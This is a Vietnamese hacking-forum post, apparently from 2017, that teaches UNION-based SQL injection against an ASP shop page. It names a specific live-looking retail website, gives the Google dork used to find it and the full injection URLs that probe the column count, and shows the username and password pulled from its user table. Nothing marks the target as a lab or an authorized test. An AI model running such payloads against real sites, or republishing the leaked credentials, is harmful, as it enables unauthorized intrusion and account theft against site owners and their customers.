ASP SQL Injection_Havij khó ra nhé.

Discussion in 'Web Application Security & Hacking' started by Mickey, Dec 9, 2017.

  1. Mickey

    Mickey Hacking For Hacker Staff Member

    Tìm site bằng dork cũ rồi "inurl:shopdisplayproducts.asp?id=" nên đụng tut bác nào thì bỏ qua nha:
    site đây:http://hoffmans.co.za/
    check:http://hoffmans.co.za/shopdisplayproducts.asp?id=1'
    Lỗi:
    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

    [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'ccategory = 1' Order By specialOffer DESC, cname'.

    /shop$db.asp, line 831

    ok:"Microsoft OLE DB Provider for ODBC Drivers error '80040e14'"

    Bắt đầu:
    Thêm dòng sau vào URL : union select 1 from tbluser' thành: hoffmans.co.za/shopdisplayproducts.asp?id=1 union select 1 from tbluser'
    vẫn lỗi, tiếp nào: hoffmans.co.za/shopdisplayproducts.asp?id=1 union select 1,2 from tbluser' >>>>vẫn lỗi
    tiếp hoffmans.co.za/shopdisplayproducts.asp?id=1 union select 1,2,3 from tbluser' >>>vẫn lỗi
    mỏi tay quá, mọi người tự thêm các số vào nhé, dùng thêm addon hackbar cho tiện, mình thì mình mò ra rồi, nói luôn 30:

    http://hoffmans.co.za/shopdisplayproducts.asp?id=1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from tbluser'

    ra cả đống số (1,3,4,21,22)! nhìn thích vl

    Giờ chọn đại 2 số, mình chọn 3 và 4 thay tương ứng là:fldusername và fldpassword
    thành ra thế này: http://hoffmans.co.za/shopdisplayproducts.asp?id=1 UNION SELECT 1,2,fldusername,fldpassword,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from tbluser'

    và đc thế này: mike|sweet
     

Share This Page